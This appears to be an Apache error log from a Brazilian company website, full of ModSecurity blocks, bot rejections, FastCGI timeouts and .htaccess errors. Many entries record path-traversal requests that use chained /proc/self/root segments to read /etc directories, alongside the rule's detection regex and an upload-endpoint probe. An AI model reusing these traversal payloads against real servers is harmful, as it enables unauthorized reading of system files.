https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 01:52:39.029829 2026] [proxy_fcgi:error] [pid 21563:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55416] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:52:50.310898 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:49722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzSota6ubjKNq_cu4aMgwAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 01:53:01.350781 2026] [proxy_fcgi:error] [pid 21219:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:55984] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:53:26.041821 2026] [proxy_fcgi:error] [pid 15826:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56610] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:53:55.121788 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57294] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:54:11.417649 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:44016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzS89a6ubjKNq_cu4aMywAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:54:13.835997 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.243.128:42144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzS9fXLqtnMIWvjpaJV8QAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 01:54:28.120590 2026] [proxy_fcgi:error] [pid 5816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:58200] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:55:10.137863 2026] [proxy_fcgi:error] [pid 21563:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:59354] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:55:26.631003 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.228.61:55342] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzTPuoXxyEfFpUF8f9D7gAAAVE"]
[Fri Mar 20 01:55:46.069821 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60478] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:56:11.385808 2026] [proxy_fcgi:error] [pid 30077:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:32966] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:56:18.935894 2026] [mime_magic:error] [pid 5816:tid 140411565680384] (70014)End of file found: [client 57.141.18.107:37538] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 01:56:33.128772 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33736] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:56:50.934588 2026] [mime_magic:error] [pid 15826:tid 140411599251200] (70014)End of file found: [client 57.141.18.70:38546] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 01:56:55.162651 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:34440] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:57:11.712531 2026] [mime_magic:error] [pid 5816:tid 140411741927168] (70014)End of file found: [client 57.141.18.31:39202] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 01:57:17.125979 2026] [proxy_fcgi:error] [pid 21219:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:35136] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:57:22.776812 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.244.43:50786] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzTsvu8EFLIOrSqIpvfiwAAAkc"]
[Fri Mar 20 01:57:38.129796 2026] [proxy_fcgi:error] [pid 8307:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35744] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:57:48.197831 2026] [proxy_fcgi:error] [pid 8307:tid 140411548894976] [client 162.241.203.82:19192] AH01071: Got error 'Primary script unknown'
[Fri Mar 20 01:58:00.101875 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36428] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:58:14.158495 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:42158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzT5gkwaGbbGflqUZAD1gAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:58:22.153855 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37128] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:58:45.122195 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37864] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:59:08.454524 2026] [mime_magic:error] [pid 7893:tid 140411616036608] (70014)End of file found: [client 57.141.18.10:42796] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 01:59:13.937812 2026] [proxy_fcgi:error] [pid 7235:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38702] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:59:36.153799 2026] [proxy_fcgi:error] [pid 15826:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:39350] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:59:59.117805 2026] [proxy_fcgi:error] [pid 8307:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:40056] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:00:29.121772 2026] [proxy_fcgi:error] [pid 7893:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:40856] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:00:34.437892 2026] [mime_magic:error] [pid 21219:tid 140411741927168] (70014)End of file found: [client 57.141.18.111:44664] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:00:55.439061 2026] [:error] [pid 5816:tid 140411574073088] [client 74.7.243.128:52156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzUh5fmNfuxceSuAELMEQAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:00:59.129791 2026] [proxy_fcgi:error] [pid 8307:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:41788] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:01:20.034023 2026] [mime_magic:error] [pid 26799:tid 140411666392832] (70014)End of file found: [client 74.7.241.31:33476] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/spool
[Fri Mar 20 02:01:29.050138 2026] [proxy_fcgi:error] [pid 7893:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42698] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:01:32.535890 2026] [core:alert] [pid 7235:tid 140411708356352] [client 57.141.18.59:46618] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:02:00.169923 2026] [proxy_fcgi:error] [pid 8307:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:43686] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:02:27.137781 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44566] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:02:27.347145 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.244.43:33362] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzU49a6ubjKNq_cu4aN7gAAA0E"]
[Fri Mar 20 02:02:52.141813 2026] [proxy_fcgi:error] [pid 21563:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45370] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:03:10.921974 2026] [core:alert] [pid 7893:tid 140411557287680] [client 57.141.18.14:49184] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Fri Mar 20 02:03:13.126729 2026] [proxy_fcgi:error] [pid 8307:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46018] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:03:35.142014 2026] [proxy_fcgi:error] [pid 7893:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46682] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:03:47.298016 2026] [mime_magic:error] [pid 15826:tid 140411674785536] (70014)End of file found: [client 57.141.18.84:50262] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:03:57.073836 2026] [proxy_fcgi:error] [pid 21219:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47454] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:04:19.133697 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48082] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:04:34.481710 2026] [:error] [pid 5816:tid 140411733534464] [client 74.7.243.128:52160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzVYpfmNfuxceSuAELMlwAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:04:42.427840 2026] [proxy_fcgi:error] [pid 21563:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:48652] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:05:04.974182 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:43042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzVgAkwaGbbGflqUZAFLAAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 02:05:09.273816 2026] [proxy_fcgi:error] [pid 8307:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:49320] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:05:37.539105 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.228.61:45792] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzVofqxLDW4GITHUkSi_wAAARY"]
[Fri Mar 20 02:05:40.165776 2026] [proxy_fcgi:error] [pid 21219:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50068] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:05:43.549529 2026] [mime_magic:error] [pid 30077:tid 140411708356352] (70014)End of file found: [client 57.141.18.47:51842] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:05:55.639290 2026] [core:alert] [pid 7235:tid 140411590858496] [client 57.141.18.88:52928] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:06:03.129776 2026] [proxy_fcgi:error] [pid 8307:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:50686] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:06:20.022814 2026] [mime_magic:error] [pid 30077:tid 140411683178240] (70014)End of file found: [client 57.141.18.74:53448] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:06:24.157794 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51300] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:06:46.120010 2026] [proxy_fcgi:error] [pid 30077:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:51790] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:07:08.126301 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52264] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:07:38.126996 2026] [proxy_fcgi:error] [pid 7235:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53120] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:07:56.467797 2026] [mime_magic:error] [pid 7893:tid 140411616036608] (70014)End of file found: [client 57.141.18.61:56670] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:08:12.125825 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54078] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:08:17.536427 2026] [mime_magic:error] [pid 5816:tid 140411691570944] (70014)End of file found: [client 57.141.18.90:57458] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:08:46.132114 2026] [proxy_fcgi:error] [pid 7893:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:55078] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:09:13.145825 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55770] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:09:35.054036 2026] [proxy_fcgi:error] [pid 5816:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56416] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:09:57.125838 2026] [proxy_fcgi:error] [pid 7893:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57008] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:10:20.125787 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57546] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:10:25.945376 2026] [core:alert] [pid 7893:tid 140411683178240] [client 66.249.74.169:53879] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:10:46.246222 2026] [proxy_fcgi:error] [pid 21563:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58152] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:11:01.585075 2026] [mime_magic:error] [pid 21219:tid 140411666392832] (70014)End of file found: [client 57.141.18.87:33600] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:11:09.261667 2026] [core:alert] [pid 5816:tid 140411590858496] [client 57.141.18.47:33816] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:11:11.154337 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58794] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:11:20.813151 2026] [:error] [pid 21563:tid 140411590858496] [client 87.121.84.71:34150] [client 87.121.84.71] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "ALittle" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/admin/jQuery-File-Upload/server/php/index.php"] [unique_id "abzW-Epm7ZmxKZTM4baATQAAA5I"]
[Fri Mar 20 02:11:20.865325 2026] [:error] [pid 21563:tid 140411708356352] [client 74.7.243.128:52164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzW-Epm7ZmxKZTM4baATgAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:11:34.127062 2026] [proxy_fcgi:error] [pid 21219:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59370] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:11:57.045831 2026] [proxy_fcgi:error] [pid 5816:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60016] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:12:21.129769 2026] [proxy_fcgi:error] [pid 8307:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:60830] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:12:44.062136 2026] [proxy_fcgi:error] [pid 7235:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33192] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:13:08.390938 2026] [proxy_fcgi:error] [pid 8307:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33796] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:13:11.049391 2026] [core:alert] [pid 7235:tid 140411599251200] [client 57.141.18.92:37068] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:13:35.137886 2026] [proxy_fcgi:error] [pid 8307:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:34530] AH01075: Error dispatching request to : (polling)
